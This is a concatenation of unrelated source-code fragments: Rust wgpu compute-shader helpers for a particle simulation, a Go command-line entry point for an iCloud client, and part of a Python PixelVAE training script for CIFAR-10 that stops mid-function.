particle_instance_chunk[5] = 0.0;
}
let mut particle_buffers = Vec::<wgpu::Buffer>::new();
for i in 0..2 {
particle_buffers.push(
device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some(&format!("Particle Buffer {}", i)),
contents: bytemuck::cast_slice(&initial_particle_data),
usage: wgpu::BufferUsages::VERTEX
| wgpu::BufferUsages::STORAGE
| wgpu::BufferUsages::COPY_DST
| wgpu::BufferUsages::MAP_READ,
}),
);
}
return particle_buffers;
}
fn create_parameter_buffer(device: &wgpu::Device, param_data: &Vec<f32>) -> wgpu::Buffer {
device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some("Parameter Buffer"),
contents: bytemuck::cast_slice(¶m_data),
usage: wgpu::BufferUsages::UNIFORM | wgpu::BufferUsages::COPY_DST,
})
}
fn create_parameter_bind_group(
device: &wgpu::Device,
parameter_bind_group_layout: &wgpu::BindGroupLayout,
parameter_buffer: &wgpu::Buffer,
) -> wgpu::BindGroup {
device.create_bind_group(&wgpu::BindGroupDescriptor {
layout: ¶meter_bind_group_layout,
entries: &[wgpu::BindGroupEntry {
binding: 0,
resource: parameter_buffer.as_entire_binding(),
}],
label: None,
})
}
fn create_particle_bind_groups(
device: &wgpu::Device,
compute_bind_group_layout: &wgpu::BindGroupLayout,
particle_buffers: &Vec<wgpu::Buffer>,
) -> Vec<wgpu::BindGroup> {
let mut particle_bind_groups = Vec::<wgpu::BindGroup>::new();
for i in 0..2 {
particle_bind_groups.push(device.create_bind_group(&wgpu::BindGroupDescriptor {
layout: &compute_bind_group_layout,
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: particle_buffers[i].as_entire_binding(),
},
wgpu::BindGroupEntry {
binding: 1,
resource: particle_buffers[(i + 1) % 2].as_entire_binding(),
},
],
label: None,
}));
}
return particle_bind_groups;
}
fn compute_work_group_count(
(width, height): (u32, u32),
(workgroup_width, workgroup_height): (u32, u32),
) -> (u32, u32) {
let x = (width + workgroup_width - 1) / workgroup_width;
let y = (height + workgroup_height - 1) / workgroup_height;
return (x, y);
}
fn create_gray_texture(
device: &wgpu::Device,
queue: &wgpu::Queue,
input_image: &DynamicImage,
shader: &wgpu::ShaderModule,
texture_size: wgpu::Extent3d,
) -> wgpu::Texture {
let input_texture = device.create_texture(&wgpu::TextureDescriptor {
label: Some("input"),
size: texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Rgba8UnormSrgb,
usage: wgpu::TextureUsages::TEXTURE_BINDING | wgpu::TextureUsages::COPY_DST,
});
queue.write_texture(
input_texture.as_image_copy(),
&input_image.to_rgba8(),
wgpu::ImageDataLayout {
offset: 0,
bytes_per_row: std::num::NonZeroU32::new(4 * texture_size.width),
rows_per_image: std::num::NonZeroU32::new(texture_size.height),
},
texture_size,
);
let output_texture = device.create_texture(&wgpu::TextureDescriptor {
label: Some("gray texture"),
size: texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Rgba32Float,
usage: wgpu::TextureUsages::TEXTURE_BINDING | wgpu::TextureUsages::STORAGE_BINDING,
});
let pipeline = device.create_compute_pipeline(&wgpu::ComputePipelineDescriptor {
label: Some("grayscale pipeline"),
layout: None,
module: &shader,
entry_point: "main",
});
let bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor {
label: Some("gray scale bind group"),
layout: &pipeline.get_bind_group_layout(0),
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: wgpu::BindingResource::TextureView(
&input_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
wgpu::BindGroupEntry {
binding: 1,
resource: wgpu::BindingResource::TextureView(
&output_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
],
});
let mut encoder =
device.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
{
let (dispatch_width, dispatch_height) =
compute_work_group_count((texture_size.width, texture_size.height), (16, 16));
let mut compute_pass =
encoder.begin_compute_pass(&wgpu::ComputePassDescriptor { label: None });
compute_pass.set_pipeline(&pipeline);
compute_pass.set_bind_group(0, &bind_group, &[]);
compute_pass.dispatch(dispatch_width, dispatch_height, 1);
}
queue.submit(Some(encoder.finish()));
return output_texture;
}
fn create_cache_texture(
device: &wgpu::Device,
queue: &wgpu::Queue,
input_texture: &wgpu::Texture,
shader: &wgpu::ShaderModule,
texture_size: wgpu::Extent3d,
) -> wgpu::Texture {
let output_texture = device.create_texture(&wgpu::TextureDescriptor {
label: Some("cache texture"),
size: texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Rgba32Float,
usage: wgpu::TextureUsages::TEXTURE_BINDING | wgpu::TextureUsages::STORAGE_BINDING,
});
let param = vec![BLANK_LEVEL, NUM_PARTICLES as f32 * Q_CHARGE];
let param_buffer = device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some("cache param buffer"),
contents: bytemuck::cast_slice(¶m),
usage: wgpu::BufferUsages::UNIFORM | wgpu::BufferUsages::COPY_DST,
});
let bind_group_layout = device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[
wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Uniform,
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new(
(param.len() * mem::size_of::<f32>()) as _,
),
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 1,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Texture {
multisampled: false,
view_dimension: wgpu::TextureViewDimension::D2,
sample_type: wgpu::TextureSampleType::Float { filterable: false },
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 2,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::StorageTexture {
access: wgpu::StorageTextureAccess::WriteOnly,
view_dimension: wgpu::TextureViewDimension::D2,
format: wgpu::TextureFormat::Rgba32Float,
},
count: None,
},
],
label: Some("cache bind group layout"),
});
let bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor {
label: Some("cache scale bind group"),
layout: &bind_group_layout,
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: param_buffer.as_entire_binding(),
},
wgpu::BindGroupEntry {
binding: 1,
resource: wgpu::BindingResource::TextureView(
&input_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
wgpu::BindGroupEntry {
binding: 2,
resource: wgpu::BindingResource::TextureView(
&output_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
],
});
let pipeline = device.create_compute_pipeline(&wgpu::ComputePipelineDescriptor {
label: Some("cache pipeline"),
layout: Some(
&device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some("cache pipeline layout"),
bind_group_layouts: &[&bind_group_layout],
push_constant_ranges: &[],
}),
),
module: &shader,
entry_point: "main",
});
let mut encoder =
device.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
{
let (dispatch_width, dispatch_height) =
compute_work_group_count((texture_size.width, texture_size.height), (16, 16));
let mut compute_pass =
encoder.begin_compute_pass(&wgpu::ComputePassDescriptor { label: None });
compute_pass.set_pipeline(&pipeline);
compute_pass.set_bind_group(0, &bind_group, &[]);
compute_pass.dispatch(dispatch_width, dispatch_height, 1);
}
queue.submit(Some(encoder.finish()));
return output_texture;
}
fn save_gif(path: &str, frames: &mut Vec<Vec<u8>>, speed: i32, size: u16) -> anyhow::Result<()> {
use gif::{Encoder, Frame, Repeat};
let mut image = std::fs::File::create(path)?;
let mut encoder = Encoder::new(&mut image, size, size, &[])?;
encoder.set_repeat(Repeat::Infinite)?;
for mut frame in frames {
encoder.write_frame(&Frame::from_rgba_speed(size, size, &mut frame, speed))?;
}
Ok(())
}
fn padded_bytes_per_row(width: u32) -> usize {
let bytes_per_row = width as usize * 4;
let padding = (256 - bytes_per_row % 256) % 256;
bytes_per_row + padding
}
| main |
main.go | package main
import (
"fmt"
"os"
cli "github.com/jawher/mow.cli"
)
// Provisioned by ldflags
// nolint: gochecknoglobals
var (
version string
commitHash string
buildDate string
)
var verbose *bool
func main() | {
app := cli.App("igo", "iCloud Client in go")
app.Spec = "[-v]"
verbose = app.BoolOpt("v verbose", false, "Verbose debug mode")
app.Before = func() {
if *verbose {
// TODO: enable verbose
fmt.Println("Verbose mode enabled")
}
configure()
}
app.Command("login", "iCloud login", loginCmd)
app.Command("drive", "iCloud Drive", driveCmd)
app.Command("version", "version", func(cmd *cli.Cmd) {
cmd.Action = func() {
fmt.Printf("%s version %s (%s) built on %s\n", friendlyAppName, version, commitHash, buildDate)
}
})
app.Run(os.Args)
} |
|
cifarinterpolation1_filter_3_mean_beta_largesample.py | """
PixelVAE: A Latent Variable Model for Natural Images
Ishaan Gulrajani, Kundan Kumar, Faruk Ahmed, Adrien Ali Taiga, Francesco Visin, David Vazquez, Aaron Courville
"""
import os, sys
sys.path.append(os.getcwd())
N_GPUS = 2
import random
import tflib as lib
import tflib.sampling_loop_cifar_filter_3
import tflib.ops.kl_unit_gaussian
import tflib.ops.kl_gaussian_gaussian
import tflib.ops.conv2d
import tflib.ops.linear
import tflib.ops.batchnorm
import tflib.ops.embedding
import tflib.cifar
import tflib.cifar_256
import numpy as np
import tensorflow as tf
import imageio
from imageio import imsave
import keras
import time
import functools
import sklearn
from sklearn.model_selection import train_test_split
DATASET = 'cifar10' # mnist_256
SETTINGS = '32px_cifar' # mnist_256, 32px_small, 32px_big, 64px_small, 64px_big
OUT_DIR = DATASET + '_interpolation1_final_filter_3_mean_beta_largesample'
if not os.path.isdir(OUT_DIR):
os.makedirs(OUT_DIR)
print "Created directory {}".format(OUT_DIR)
if SETTINGS == 'mnist_256':
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
# Whether to treat pixel inputs to the model as real-valued (as in the
# original PixelCNN) or discrete (gets better likelihoods).
EMBED_INPUTS = True
# Turn on/off the bottom-level PixelCNN in Dec1/DecFull
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 32
DIM_1 = 16
DIM_2 = 32
DIM_3 = 32
DIM_4 = 64
LATENT_DIM_2 = 128
NUM_CLASSES = 10
ALPHA1_ITERS = 5000
ALPHA2_ITERS = 5000
KL_PENALTY = 1.0
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 2*500,
'stop_after': 500*500,
'callback_every': 10*500
}
LR = 1e-3
LR_DECAY_AFTER = TIMES['stop_after']
LR_DECAY_FACTOR = 1.
BATCH_SIZE = 100
N_CHANNELS = 1
HEIGHT = 28
WIDTH = 28
# These aren't actually used for one-level models but some parts
# of the code still depend on them being defined.
LATENT_DIM_1 = 64
LATENTS1_HEIGHT = 7
LATENTS1_WIDTH = 7
elif SETTINGS == '32px_small':
MODE = 'two_level'
EMBED_INPUTS = True
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 128
DIM_1 = 64
DIM_2 = 128
DIM_3 = 256
LATENT_DIM_1 = 64
DIM_PIX_2 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
ALPHA1_ITERS = 2000
ALPHA2_ITERS = 5000
KL_PENALTY = 1.00
BETA_ITERS = 1000
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 1000,
'stop_after': 200000,
'callback_every': 20000
}
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = 1e-1
BATCH_SIZE = 64
N_CHANNELS = 3
HEIGHT = 32
WIDTH = 32
LATENTS1_HEIGHT = 8
LATENTS1_WIDTH = 8
elif SETTINGS == '32px_big':
MODE = 'two_level'
EMBED_INPUTS = False
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 256
DIM_1 = 128
DIM_2 = 256
DIM_3 = 512
LATENT_DIM_1 = 128
DIM_PIX_2 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
ALPHA1_ITERS = 2000
ALPHA2_ITERS = 5000
KL_PENALTY = 1.00
BETA_ITERS = 1000
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 1000,
'stop_after': 300000,
'callback_every': 20000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = 300000
LR_DECAY_FACTOR = 1e-1
BATCH_SIZE = 64
N_CHANNELS = 3
HEIGHT = 32
WIDTH = 32
LATENTS1_HEIGHT = 8
LATENTS1_WIDTH = 8
elif SETTINGS == '64px_small':
MODE = 'two_level'
EMBED_INPUTS = True
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 128
DIM_0 = 64
DIM_1 = 64
DIM_2 = 128
LATENT_DIM_1 = 64
DIM_PIX_2 = 256
DIM_3 = 256
DIM_4 = 512
LATENT_DIM_2 = 512
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 200000,
'callback_every': 50000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = .1
ALPHA1_ITERS = 2000
ALPHA2_ITERS = 10000
KL_PENALTY = 1.0
BETA_ITERS = 1000
BATCH_SIZE = 64
N_CHANNELS = 3
HEIGHT = 64
WIDTH = 64
LATENTS1_WIDTH = 16
LATENTS1_HEIGHT = 16
elif SETTINGS == '64px_big':
MODE = 'two_level'
EMBED_INPUTS = True
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 384
DIM_0 = 192
DIM_1 = 256
DIM_2 = 512
LATENT_DIM_1 = 64
DIM_PIX_2 = 512
DIM_3 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 400000,
'callback_every': 50000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = .5
ALPHA1_ITERS = 1000
ALPHA2_ITERS = 10000
KL_PENALTY = 1.00
BETA_ITERS = 500
BATCH_SIZE = 48
N_CHANNELS = 3
HEIGHT = 64
WIDTH = 64
LATENTS1_WIDTH = 16
LATENTS1_HEIGHT = 16
elif SETTINGS=='64px_big_onelevel':
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
# Whether to treat pixel inputs to the model as real-valued (as in the
# original PixelCNN) or discrete (gets better likelihoods).
EMBED_INPUTS = True
# Turn on/off the bottom-level PixelCNN in Dec1/DecFull
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 384
DIM_0 = 192
DIM_1 = 256
DIM_2 = 512
DIM_3 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
ALPHA1_ITERS = 50000
ALPHA2_ITERS = 50000
KL_PENALTY = 1.0
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 400000,
'callback_every': 50000
}
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = 0.5
BATCH_SIZE = 48
N_CHANNELS = 3
HEIGHT = 64
WIDTH = 64
# These aren't actually used for one-level models but some parts
# of the code still depend on them being defined.
LATENT_DIM_1 = 64
LATENTS1_HEIGHT = 7
LATENTS1_WIDTH = 7
elif SETTINGS=='32px_cifar':
from keras.datasets import cifar10
(x_train_set, y_train_set), (x_test_set, y_test_set) = cifar10.load_data()
x_train_set = x_train_set.transpose(0,3,1,2)
x_test_set = x_test_set.transpose(0,3,1,2)
seed = 333
x_train_set, x_dev_set, y_train_set, y_dev_set = train_test_split(x_train_set, y_train_set, test_size=0.1, random_state=seed)
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
# Whether to treat pixel inputs to the model as real-valued (as in the
# original PixelCNN) or discrete (gets better likelihoods).
EMBED_INPUTS = True
# Turn on/off the bottom-level PixelCNN in Dec1/DecFull
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 192 #LEILA EDIT: was previously 384
DIM_0 = 96 #LEILA EDIT: was previously 192
DIM_1 = 128 #LEILA EDIT: was previously 256
DIM_2 = 256 #LEILA EDIT: was previously 512
DIM_3 = 256 #LEILA EDIT: was previously 512
DIM_4 = 256 #LEILA EDIT: was previously 512
LATENT_DIM_2 = 256 #LEILA EDIT: was previously 512
ALPHA1_ITERS = 50000
ALPHA2_ITERS = 50000
KL_PENALTY = 1.0
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 400000,
'callback_every': 50000
}
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = 0.5
BATCH_SIZE = 50 # 48
N_CHANNELS = 3
HEIGHT = 32 #64
WIDTH = 32 #64
NUM_CLASSES = 10
# These aren't actually used for one-level models but some parts
# of the code still depend on them being defined.
LATENT_DIM_1 = 32 #LEILAEDIT: was previously 64
LATENTS1_HEIGHT = 7
LATENTS1_WIDTH = 7
if DATASET == 'mnist_256':
train_data, dev_data, test_data = lib.mnist_256.load(BATCH_SIZE, BATCH_SIZE) # TODO: define new data-loader so I don't load batches
elif DATASET == 'lsun_32':
train_data, dev_data = lib.lsun_bedrooms.load(BATCH_SIZE, downsample=True)
elif DATASET == 'lsun_64':
train_data, dev_data = lib.lsun_bedrooms.load(BATCH_SIZE, downsample=False)
elif DATASET == 'imagenet_64':
train_data, dev_data = lib.small_imagenet.load(BATCH_SIZE)
elif DATASET == 'cifar10':
train_data, dev_data, test_data = lib.cifar_256.load(BATCH_SIZE) #LEILAEDIT
lib.print_model_settings(locals().copy())
DEVICES = ['/gpu:{}'.format(i) for i in xrange(N_GPUS)]
lib.ops.conv2d.enable_default_weightnorm()
lib.ops.linear.enable_default_weightnorm()
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as session:
bn_is_training = tf.placeholder(tf.bool, shape=None, name='bn_is_training')
bn_stats_iter = tf.placeholder(tf.int32, shape=None, name='bn_stats_iter')
total_iters = tf.placeholder(tf.int32, shape=None, name='total_iters')
all_images = tf.placeholder(tf.int32, shape=[None, N_CHANNELS, HEIGHT, WIDTH], name='all_images')
all_latents1 = tf.placeholder(tf.float32, shape=[None, LATENT_DIM_1, LATENTS1_HEIGHT, LATENTS1_WIDTH], name='all_latents1')
split_images = tf.split(all_images, len(DEVICES), axis=0)
split_latents1 = tf.split(all_images, len(DEVICES), axis=0)
tower_cost = []
tower_outputs1_sample = []
for device_index, (device, images, latents1_sample) in enumerate(zip(DEVICES, split_images, split_latents1)):
with tf.device(device):
def nonlinearity(x):
return tf.nn.elu(x)
def pixcnn_gated_nonlinearity(a, b):
return tf.sigmoid(a) * tf.tanh(b)
def SubpixelConv2D(*args, **kwargs):
kwargs['output_dim'] = 4*kwargs['output_dim']
output = lib.ops.conv2d.Conv2D(*args, **kwargs)
output = tf.transpose(output, [0,2,3,1])
output = tf.depth_to_space(output, 2)
output = tf.transpose(output, [0,3,1,2])
return output
def ResidualBlock(name, input_dim, output_dim, inputs, filter_size, mask_type=None, resample=None, he_init=True):
"""
resample: None, 'down', or 'up'
"""
if mask_type != None and resample != None:
raise Exception('Unsupported configuration')
if resample=='down':
conv_shortcut = functools.partial(lib.ops.conv2d.Conv2D, stride=2)
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=input_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim, stride=2)
elif resample=='up':
conv_shortcut = SubpixelConv2D
conv_1 = functools.partial(SubpixelConv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
elif resample==None:
conv_shortcut = lib.ops.conv2d.Conv2D
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
else:
raise Exception('invalid resample value')
if output_dim==input_dim and resample==None:
shortcut = inputs # Identity skip-connection
else:
shortcut = conv_shortcut(name+'.Shortcut', input_dim=input_dim, output_dim=output_dim, filter_size=1, mask_type=mask_type, he_init=False, biases=True, inputs=inputs)
output = inputs
if mask_type == None:
output = nonlinearity(output)
output = conv_1(name+'.Conv1', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False)
output = nonlinearity(output)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False, biases=False)
if device_index == 0:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter)
else:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter, update_moving_stats=False)
else:
output = nonlinearity(output)
output_a = conv_1(name+'.Conv1A', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output_b = conv_1(name+'.Conv1B', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output = pixcnn_gated_nonlinearity(output_a, output_b)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
return shortcut + output
def Enc1(images):
output = images
if WIDTH == 64:
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_0, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Enc1.InputRes0', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.InputRes', input_dim=DIM_0, output_dim=DIM_1, filter_size=3, resample='down', inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Enc1.InputRes', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample='down', inputs=output)
else:
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Enc1.Res1Pre', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res1Pre2', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res1', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs=output)
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Enc1.Res4Pre', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res4', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res4Post', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
mu_and_sigma = lib.ops.conv2d.Conv2D('Enc1.Out', input_dim=DIM_2, output_dim=2*LATENT_DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = ResidualBlock('Enc1.Res2Pre', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res2Pre2', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res2', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('Enc1.Res3Pre', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res3Pre2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res3Pre3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
mu_and_sigma = lib.ops.conv2d.Conv2D('Enc1.Out', input_dim=DIM_3, output_dim=2*LATENT_DIM_1, filter_size=1, inputs=output, he_init=False)
return mu_and_sigma, output
def Dec1(latents, images):
output = tf.clip_by_value(latents, -50., 50.)
if LATENTS1_WIDTH == 16:
output = lib.ops.conv2d.Conv2D('Dec1.Input', input_dim=LATENT_DIM_1, output_dim=DIM_2, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Dec1.Res1A', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1B', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1C', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Input', input_dim=LATENT_DIM_1, output_dim=DIM_3, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Dec1.Res1', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1Post', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1Post2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res2', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', inputs=output)
output = ResidualBlock('Dec1.Res2Post', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res2Post2', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res3', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', inputs=output)
output = ResidualBlock('Dec1.Res3Post', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res3Post2', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
if WIDTH == 64:
output = ResidualBlock('Dec1.Res4', input_dim=DIM_1, output_dim=DIM_0, filter_size=3, resample='up', inputs=output)
output = ResidualBlock('Dec1.Res4Post', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, inputs=output)
if PIXEL_LEVEL_PIXCNN:
if WIDTH == 64:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_0, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS, output_dim=DIM_0, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
# Make the variance of output and masked_images (roughly) match
output /= 2
# Warning! Because of the masked convolutions it's very important that masked_images comes first in this concat
output = tf.concat([masked_images, output], axis=1)
if WIDTH == 64:
output = ResidualBlock('Dec1.Pix2Res', input_dim=2*DIM_0, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('Dec1.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('Dec1.Pix4Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
else:
output = ResidualBlock('Dec1.Pix2Res', input_dim=2*DIM_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('Dec1.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
